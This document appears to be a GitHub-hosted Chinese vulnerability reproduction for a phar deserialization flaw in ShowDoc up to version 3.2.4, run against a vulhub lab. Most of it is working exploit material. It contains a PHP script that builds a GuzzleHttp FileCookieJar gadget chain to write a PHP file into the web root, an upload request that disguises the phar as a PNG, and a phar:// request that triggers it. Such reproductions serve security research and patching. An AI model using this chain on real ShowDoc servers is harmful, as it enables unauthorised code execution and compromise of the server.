Skip to content

Latest commit

 

History

History
124 lines (97 loc) · 3.9 KB

showdoc3.2.4-phar反序列漏洞复现.md

File metadata and controls

124 lines (97 loc) · 3.9 KB

showdoc<=3.2.4 phar反序列漏洞复现

环境:https://github.com/vulhub/vulhub/tree/master/showdoc/3.2.5-sqli

生成phar

<?php

namespace GuzzleHttp\Cookie{

    class SetCookie {
        private static $defaults = [
            'Name'     => null,
            'Value'    => null,
            'Domain'   => null,
            'Path'     => '/',
            'Max-Age'  => null,
            'Expires'  => null,
            'Secure'   => false,
            'Discard'  => false,
            'HttpOnly' => false
        ];
        function __construct()
        {
            $this->data['Expires'] = '<?php phpinfo();?>';
            $this->data['Discard'] = 0;
        }
    }

    class CookieJar{
        private $cookies = [];
        private $strictMode;
        function __construct() {
            $this->cookies[] = new SetCookie();
        }
    }

    class FileCookieJar extends CookieJar {
        private $filename;
        private $storeSessionCookies;
        function __construct() {
            parent::__construct();
            $this->filename = "/var/www/html/shell.php";
            $this->storeSessionCookies = true;
        }
    }
}

namespace{
    $pop = new \GuzzleHttp\Cookie\FileCookieJar();
    $phar = new \Phar("y4tacker.phar");
    $phar->startBuffering();
    $phar->setStub('GIF89a'."__HALT_COMPILER();");
    $phar->setMetadata($pop);
    $phar->addFromString("test.txt", "test");
    $phar->stopBuffering();
}

文件上传

将生成的y4tacker.phar 命名为y4tacker.png,并上传到目标服务器上

user_token 可以使用 showdoc<=3.2.5 注入漏洞

image-20240605084947972

POST /server/index.php?s=/api/page/upload HTTP/1.1
Host: 172.17.187.187:4999
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryouyPGbWFA31vLr9M
Referer: http://172.17.187.187:4999/web/
Accept-Language: zh-CN,zh;q=0.9
Origin: http://172.17.187.187:4999
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: */*
Content-Length: 1383

------WebKitFormBoundaryouyPGbWFA31vLr9M
Content-Disposition: form-data; name="page_id"

191212032
------WebKitFormBoundaryouyPGbWFA31vLr9M
Content-Disposition: form-data; name="item_id"

646578755a
------WebKitFormBoundaryouyPGbWFA31vLr9M
Content-Disposition: form-data; name="user_token"

271e074d6f1a642a9da4dca75579066a77045d9e8846a349465f7ac9717d70f1
------WebKitFormBoundaryouyPGbWFA31vLr9M
Content-Disposition: form-data; name="file"; filename="y4tacker.png"
Content-Type: image/png

{{file(C:\Penetration\TrafficTools\phpStudy\WWW\y4tacker.png)}}
------WebKitFormBoundaryouyPGbWFA31vLr9M--

image-20240607163524529

访问链接获取上传的文件路径

image-20240607163640002

触发phar反序列漏洞

GET /server/index.php?s=/home/index/new_is_writeable&file=phar://../Public/Uploads/2024-06-07/6662c593a97fe.png HTTP/1.1
Host:  172.17.187.187:4999
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Upgrade-Insecure-Requests: 1

image-20240607163847980

image-20240607163904233

image-20240607164014016